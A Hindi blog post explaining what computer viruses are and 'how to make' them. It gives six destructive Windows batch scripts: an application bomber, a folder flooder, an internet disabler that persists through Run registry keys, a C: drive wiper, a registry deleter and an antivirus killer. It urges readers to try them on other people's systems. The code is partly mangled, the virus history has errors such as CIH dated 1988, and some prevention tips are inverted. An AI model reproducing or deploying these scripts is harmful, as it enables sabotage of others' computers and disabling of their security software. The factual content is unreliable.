Computer Virus क्या है और कैसे बनाए

वायरस क्या  है ? आप जानने के लिए उत्साहित है, आज के समय मे कम्प्यूटर का उपयोग करना सभी लोगों को आता है, और आप लोगों मे से बहुत से लोग कंप्यूटर वायरस से वाकिफ होंगे।  

computer virus


कंप्यूटर वायरस (Virus in Hindi),ये बहुत ही लोकप्रिय  नाम है जो हमेसा सुनने को आता है, ये जो वायरस है ये आपके Computer  और अन्य  चीजों जैसे मोबाईल के लिए अत्यंत हानिकारक है  

Computer Virus  के बारे में आप लोगों मे से बहुत को कुछ बाते पता होंगी जैसे कि वायरस क्या है और कैसे बनाए।  

आज मैं इस लेख में आप लोगों को Computer  वायरस क्या होता है  और  इसको कैसे हटाते है बताने वाला हू.

Computer virus  क्या है-What is Computer Virus hindi

Computer Virus एक प्रोग्राम है जो आपके कंप्यूटर को और computer के डाटा को डिलीट या फिर computer को ख़राब कर देता है। 

कोई भी Computer virus आपके बिना जानकारी मे आए ही आपके कंप्युटर को ऐसे खराब कर देगा को आप खुद से उसको ठीक नहीं कर सकते है.जैसे आपको पता होगा की कंप्युटर के ऑपरेटिंग सिस्टम मे बहुत फाइल होती है अगर उन्मे से कोई एक भी डिलीट होगाई तो आपका कॉमपुटेर  ठीक से काम नहीं करेगा या फिर कंप्युटर खराब भी हो सकता है।

Computer virus कैसे बनाए-How to make computer virus hindi

आप लोगों मे से बहुत से लोग ये नहीं जानते है की वायरस कैसे बनता है, आज मै आपको बताऊँगा की कैसे आप computer  वायरस खुद से बना सकते है। पूरा स्टेप फॉलो करे। 

 

·        मैंने नीचे नीचे कुछ कंप्युटर वायरस के कोड दिए है आप उनको नोटपैड मे टाइप करके या पेस्ट करने के बाद  . bat extension  मे सेव कर दे।

1. Application Bomber:

ये कोड एक application bomber virus  का कोड है इससे कई सारे ऐप्लकैशन प्रोग्राम अपने आप खुलने लगेंगे, जिससे किसी का भी सिस्टम crash हो सकता है। इसको आप किसी और के सिस्टम मे try करे।

Code:

@echo off:xstart winwordstart mspaintstart notepadstart writestart

cmdstart explorerstart controlstart calcgoto x

आप यह ऐप्लकैशन का नाम चेंज कर सकते है।

2. Folder Flooder:

ये जो कोड है इस वायरस से आपके computer मे अनलिमिटेड folder बनना स्टार्ट हो जाएंगे, ये भी आपके या किसी के भी सिस्टम को क्रैश कर सकता है।

Code:

@echo off:xmd %random%/folder.goto x

3. Internet Disabler:

याद रखे दोस्तों इस वायरस से आपका Internet Permanently बंद हो जाएगा जिससे आपके कंप्युटर मे कभी इंटरनेट नहीं चल पाएगा। इसको सोच समझ कर ही रन करे।

Code:

echo @echo off>c:windowswimn32.bat

echo break off>c:windowswimn32.bat echo

ipconfig/release_all>c:windowswimn32.batecho

end>c:windowswimn32.batreg addhkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v

WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg

addhkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v

CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!PAUSE

4. Crash Window:

इस वायरस को run करने से आपका विंडोज़ क्रैश होगा और फिर सिस्टम की सारी फाइल डिलीट  हो जाएंगी। ये c ड्राइव की सारी फाइल डिलीट कर देगा। इसको किसी के सिस्टम मे इस्तेमाल करे।

Code:

@Echo offDel C: *.* |y

5. Ragistry Deleter:

 

ये वायरस registry files को डिलीट कर देता है। इसको भी इस्तेमाल करे खतरनाक हो सकता है।

Code:

@ECHO OFFSTART reg delete HKCR/.exeSTART reg delete

HKCR/.dllSTART reg delete HKCR/*:MESSAGEECHO Your computer

has been hacked

6. Antivirus Disabler:

जैस इसके नाम से पता चल रहा है antivirus disabler virus ये वायरस आपके computer के Antivirus  को पेरमेंटली बंद कर देता है। जिससे आपका computer secure नहीं रह जाता है।

Code:

@ echo off

rem

rem Permanently Kill Anti-Virus

net stop “Security Center”

netsh firewall set opmode mode=disable

tskill /A av*

tskill /A fire*

tskill /A anti*

cls

tskill /A spy*

tskill /A bullguard

tskill /A PersFw

tskill /A KAV*

tskill /A ZONEALARM

tskill /A SAFEWEB

cls

tskill /A spy*

tskill /A bullguard

tskill /A PersFw

tskill /A KAV*

tskill /A ZONEALARM

tskill /A SAFEWEB

cls

tskill /A OUTPOST

tskill /A nv*

tskill /A nav*

tskill /A F-*

tskill /A ESAFE

tskill /A cle

cls

tskill /A BLACKICE

tskill /A def*

tskill /A kav

tskill /A kav*

tskill /A avg*

tskill /A ash*

cls

tskill /A aswupdsv

tskill /A ewid*

tskill /A guard*

tskill /A guar*

tskill /A gcasDt*

tskill /A msmp*

cls

tskill /A mcafe*

tskill /A mghtml

tskill /A msiexec

tskill /A outpost

tskill /A isafe

tskill /A zap*cls

tskill /A zauinst

tskill /A upd*

tskill /A zlclien*

tskill /A minilog

tskill /A cc*

tskill /A norton*

cls

tskill /A norton au*

tskill /A ccc*

tskill /A npfmn*

tskill /A loge*

tskill /A nisum*

tskill /A issvc

tskill /A tmp*

cls

tskill /A tmn*

tskill /A pcc*

tskill /A cpd*

tskill /A pop*

tskill /A pav*

tskill /A padmincls

tskill /A panda*

tskill /A avsch*

tskill /A sche*

tskill /A syman*

tskill /A virus*

tskill /A realm*cls

tskill /A sweep*

tskill /A scan*

tskill /A ad-*

tskill /A safe*

tskill /A avas*

tskill /A norm*

cls

tskill /A offg*

del /Q /F C:Program Filesalwils~1avast4*.*

del /Q /F C:Program FilesLavasoftAd-awa~1*.exe

del /Q /F C:Program Fileskasper~1*.exe

cls

del /Q /F C:Program Filestrojan~1*.exe

del /Q /F C:Program Filesf-prot95*.dll

del /Q /F C:Program Filestbav*.datcls

del /Q /F C:Program Filesavpersonal*.vdf

del /Q /F C:Program FilesNorton~1*.cnt

del /Q /F C:Program FilesMcafee*.*

cls

del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*

del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*

del /Q /F C:Program FilesNorton~1Norton~1*.*

del /Q /F C:Program FilesNorton~1*.*

cls

del /Q /F C:Program Filesavgamsr*.exe

del /Q /F C:Program Filesavgamsvr*.exe

del /Q /F C:Program Filesavgemc*.exe

cls

del /Q /F C:Program Filesavgcc*.exe

del /Q /F C:Program Filesavgupsvc*.exe

del /Q /F C:Program Filesgrisoft

del /Q /F C:Program Filesnood32krn*.exe

del /Q /F C:Program Filesnood32*.exe

cls

del /Q /F C:Program Filesnod32

del /Q /F C:Program Filesnood32

del /Q /F C:Program Fileskav*.exe

del /Q /F C:Program Fileskavmm*.exe

del /Q /F C:Program Fileskaspersky*.*

cls

del /Q /F C:Program Filesewidoctrl*.exe

del /Q /F C:Program Filesguard*.exe

del /Q /F C:Program Filesewido*.exe

cls

del /Q /F C:Program Filespavprsrv*.exe

del /Q /F C:Program Filespavprot*.exe

del /Q /F C:Program Filesavengine*.exe

cls

del /Q /F C:Program Filesapvxdwin*.exe

del /Q /F C:Program Fileswebproxy*.exe

del /Q /F C:Program Filespanda

software*.*

rem

ये थे कुछ आसान से वायरस के कोड जिनको आप नोटपैड मे ही बना सकते है। उम्मीद करता हू की आपको समझ गया होगा की कैसे आप कंप्युटर वायरस बना सकते है बिना किसी दिकत के।

 

दुनिया के सबसे खतरनाक कम्प्यूटर वायरस

1. Conficker वायरस- conficker virus

इस वायरस का पता 2009 ने चला था। यह Computer Virus सोशल साइट्स से आता था। यह वायरस सिर्फ विंडोज़ ऑपरेटिंग सिस्टम से चलने वाले computer मे ही काम करता था। इस वायरस का ज्यादातर हैकर इस्तेमाल करते था इसका उपयोग करके वो सरकारी और प्राइवेट कॉम्पनी या किसी संस्था का डेटा चुराने के लिए करते थे। सिस्टम मे एक बार इस वायरस के जाने के बाद लोकल एरिया नेटवर्क से जुड़ी सारी डिवाइसेस पर असर पड़ता था|यह वायरस ज्यादा से ज्यादा लोगों को परेसान कर चुका है जिसमे सरकारी ऑफिस भी शामिल है।

2. Mebroot वायरस

इस वायरस का पता 2007 मे चला था। इस वायरस का प्रसार वेबसाईट के माध्यम से होता था। ये वायरस किसी भी वेबसाईट के माध्यम से डाउनलोड होके आपके पूरे computer को अपने काबू मे ले लेता था और आपकी जरूरी फाइल का कॉपी पर कॉपी बना लेता था। इस वायरस का ज्यादा इस्तेमाल हैकर करते थे। इसकी मदद से वो आपका पर्सनल और सीक्रिट डेटा भी देख सकते थे यह तक कि  वो आपका वेबकैम, आपकी लोकैशन, आपका वेब पर ब्राउज़ कर रहे है सब कुछ।

3. Leap वायरस

इस वायरस का पता 2006 मे चला था। और इसके प्रसार का माध्यम मैसेज या ईमेल था।यह वायरस सबसे पहले एप्पल के मैकबूक मे आया था|इस वायरस की वजह से आपके सिस्टम की स्पीड और परफॉरमेंस दोनों ही कम हो जाती थी।

4. Storm Worm वायरस

इस वायरस का भी पता 2006 मे चला था यह वायरस आपके कंप्युटर मे hyperlinks की वजह से जाता था। यह वायरस आपके कंप्युटर या मोबाईल मे किसी मेल मे आए hyperlink की वजह से जाता था और तुरंत अपने आप इंस्टॉल हो जाता था।

 

5. My Doom वायरस

इस वायरस का पता 2004 मे चला था।ये भी ईमेल या मैसेज के जरिए आता था।ये वायरस आपके मेल पर आता था जिसका subjectyour transaction is failed रहता था| यह आपके मेल मे जीतने डाटा होते थे सबको डिलीट कर डेटा था।

6. Beast Trojan Horse वायरस

शुरूआत - 2002

प्रसार का माध्यम - सॉफ्टवेयर

इसका पता 2002 मे चला था। ये कंप्युटर मे किसी सॉफ्टवेयर के जरिए जाता था

7. अन्ना कुर्निकोवा वायरस

इस वायरस की पहचान 2000 मे की गई थी। ये भी ईमेल से आता था। इस वायरस का नाम अन्ना कुर्निकोवा इस लिए पड़ा क्युकी इस वायरस के साथ टेनिस स्टार अन्ना कुर्निकोवाकी फोटो लगी होतीं थी।

8. I love you वायरस

इस वायरस की शुरुआत 2000 मे हुई। इसके प्रसार का माध्यम भी ईमेल था। इस वायरस का नाम iloveyou पड़ा क्युकी इसके सब्जेक्ट का नाम होता था|यह वायरस आपके सिस्टम मे तो फैलता ही था लेकिन आपके जान पहचान मे भी फ़ाइल जाता था क्युकी ये आपके इनबॉक्स मे पड़े 50 लोगों के मैसेज को अपने वायरस वाले मैसेज को ऑटोमैटिक लिख के भेज देता था।यह वायरस पूरे मेल और सर्वर सिस्टम को क्रैश कर देता है।

CIH वायरस

इस वायरस का शुरुआत 1988 मे हुआ था। ये वायरस हार्ड ड्राइव के माध्यम से फैलता था।ये वायरस आपके कंप्युटर के हार्ड ड्राइव को क्रैश कर देता था और bios को ओवर्राइट कर देता था।

 

Computer virus कैसे फैलता है

कंप्युटर वायरस बड़ी तेजी से तब फैलते है जब आप किसी वायरस से संकर्मित कंप्युटर से डेटा लेते है और इसी डेटा के जरिए वो आपके सिस्टम मे भी जाता है|आज कल हर व्यक्ति अपने कंप्युटर को इंटरनेट से कनेक्ट करके रखता है और वायरस का प्रसार इससे आसानी से होता है।

 

कंप्यूटर वायरस को कैसे रोकें (How to prevent computer viruses)?

कुछ तरीके है जिससे आप अपने कंप्युटर को वायरस से संक्रमित होने से बचा सकते है जैसे :-

  • एंटिवाइरस और नेट प्रटेक्टर का इस्तेमाल करे और समय समय पर उसको अपडेट करके रखे।
  • रोज अपने कंप्युटर को एंटिवाइरस से या फिर विंडोज़ के डएफेनडेर से स्कैन करे।
  • किसी अनजान व्यक्ति के द्वारा भेज गया ईमेल खोले।
  • अपने नेटवर्क को सिक्युर रखे।
  • किसी अनजान व्यक्ति के wifi  इस्तेमाल करे और ओपन wifi  का बिल्कुल भी नहीं।

 

Types of Computer virus

computer Virus कई तरह के होते है कुछ खास तरह के वायरस के नाम नीचे दिए है और उनके बारे ने जानकारी भी दी है जैसे :

Web scripting virus

वेब स्क्रिप्टिंग वायरस नाम से पता चलता है की ये किसी वेबसाईट के साथ अटैच रहते है। ये वायरस किसी वेबसाईट मे लिंक, अदवर्टिसमेंट, फोटो, या विडिओ के साथ जुड़े रहते है। जब आप इनमे से किसी पर क्लिक करते है तो इनमे जो वायरस की स्क्रिप्टिंग रहती है वो आपके कंप्युटर या फिर मोबाईल फोन मे डाउनलोड हो जाता है।इस वायरस को प्रयोग करने का एक और तरीका है ये डाउनलोड होने की जगह आपको किसी अन्य वेबसाईट पर रेडीरेक्ट कर देता है। इस वायरस के कुछ खास symptoms है जैसे की आपके डेस्कटॉप का बैकग्राउंड बदल जाना या फिर आपका कंप्युटर सही से रीस्पान्स नहीं करेगा।

Browser hijacker

इस वायरस की खास बात है की ये आपका डेटा नहीं चोरी करता है बस ये आपको थोड़ा सा परेशान करता है। ये वायरस आपको बिना बताए आपके वेब ब्राउजर का सेटिंग बदल देता है, जिस वजह से आप आपने डिज़ाइअर्ड यूआरएल  को नहीं खोल पाते उसकी जगह कुछ और ही खुल जाता है। इस तरीके का उपयोग ज्यादा तर अदवर्टिसमेंट से कमाई करने के लिए ब्लॉगगर्स करते है।इस वायरस का symptom  है की ये आपको कुछ न कुछ Advertisment  भेजेगा। 

Boot sector virus

Boot sector virus तभी फैलता है जब आप का कंप्युटर किसी ऐसे डिस्क से बूट हो जो इस वायरस से infect हो। ये वायरस आपके floppy disk मे या हार्ड डिस्क के मास्टर बूट रिकार्ड(mbr) को infected कर देता है। आज इस समय ये वायरस काम नहीं करता है।

 Direct action virus

यह वायरस कुछ खास तरह की फाइल को ही इन्फेक्ट करती है। ये ज्यादातर . com या .exe extension की फाइल को ही इन्फेक्ट करती है। जब तक आप इस वायरस के फाइल को नहीं खोलते तब तक ये वायरस अपना काम नहीं करता है।ये वायरस अपने प्रोग्राम का ढेर सारा कॉपी बनाने लगता है जिससे आपको कुछ फाइल इन्फेक्ट हो जाती है। इस वायरस को आप आसानी से एंटिवाइरस की मदद से हटा सकते है।

Network virus

जैसा की नाम से पता चल रहा है इसका काम। ये वायरस Internet और Local Area network के जरिए फैलता है। ये वायरस आपके नेटवर्क के परफॉरमेंस को बिगाड़ सकता है। इस वायरस की वजह से आपका इंटरनेट कनेक्शन पूरी तरह से डिसैबल हो जाता है, और इसको सही करना मुसकली हो जाता है। जो वायरस नेटवर्क प्रोटोकॉल के जरिए कंप्युटर को संकर्मित करते है उन्हे worm  कहा जाता है।  

 

Maltipartite virus

ये computer Virus काफी खतरनाक माना जाता है इसके बहुत से कारण है ये तेजी से फैलता है, ये एक ही बार मे आपके बूट सेक्टर और प्रोग्राम फाइल दोनों को इन्फेक्ट कर सकता है। ये File infector  और Boot Infector की मदद से पूरा काम आसानी से कर लेता है। इसी वजह से ये काफी खतरनाक वायरस है।

Macro Virus

ये Macro virus सॉफ्टवेयर या ऐप्लकैशन के द्वारा फैलता है इसीलिए ये विंडोज़ और मैक दोनों को इन्फेक्ट कर सकता है। ये वायरस ज्यादातर वर्ड प्रोसेसिंग और स्प्रेड्शीट ऐप्लकैशन मे पाया जाता है। ये वायरस सिर्फ macros से संबंधित ऐप्लकैशन को ही इन्फेक्ट करता है।

Resident virus

ये ऐसा कंप्युटर वायरस है जो आपके सिस्टम के Ram memory मे रहता है, और ये वही से सभी programs  को इन्फेक्ट करता है। इस वायरस के कुछ अन्य नाम है जैसे: CMJ, Meve, Mrklunky ,Randex आदि।

 Encrypted virus

इस वायरस को आपका एंटिवाइरस भी आसानी से  डिटेक्ट नहीं कर सकता है क्युकी ये वायरस encrypted malicious code का इस्तेमाल करता है। लेकिन ये वायरस आपके कंप्युटर के files और folders को नुकशान  नहीं करता है।लेकिन आपके सिस्टम की परफॉरमेंस को जम के नुकशान करता है।

 Malware क्या है-What is malware in hindi

मालवेर एक सॉफ्टवेयर प्रोग्राम है। इस सॉफ्टवेयर का इस्तेमाल hackers करते है इसका इस्तेमाल करके वो आपके पर्सनल files को चोरी कर सकते है।मालवेर का मतलब वायरस,स्पाइवेर,और वर्म से है। एक मालवेर आपके कंप्युटर की files को किसी अन्य कंप्युटर मे ट्रैन्स्फर कर सकता है।

मालवेयर अटैक के कारण

Malware आपके कंप्युटर मे कई तरीके से आअ सकता हैइसका सबसे बड़ा साधन है इंटरनेट जिसके जरिए ये आपके कंप्युटर मे आसानी से आ सकता है। अप जितनी ज्यादा डोनलोडिंग करनेंगे उतना ही मालवेर अटैक का खतरा रहता है।आप अगर किसी का पेन ड्राइव या हार्ड डिस्क भी लगाते है तो उससे भी मालवेर आपके सिस्टम मे आ सकता है।

मालवेर से कैसे बचे।

 सिर्फ उसी वेबसाईट से डोनलोडिंग करे जो तृसटेड हो। फर्जी वेबसाईट से डोनलोडिंग करना आपको महंगा पड़ सकता है।

  • अन्तिमलवारे ऐप्लकैशन को इंस्टॉल कर के सिस्टम को स्कैन करे।
  • विंडोज़ डएफेनडेर का इस्तेमाल करे। और उसको अपडेट रखे।
  • विंडोज़ के फाइर्वाल का इस्तेमाल करे। और इसको हुमएस ऑन रखे। ये आपके कंप्युटर मे इंटरनेट से कोई वायरस या बग नहीं आने देता है।

 

 

Post a comment

0 Comments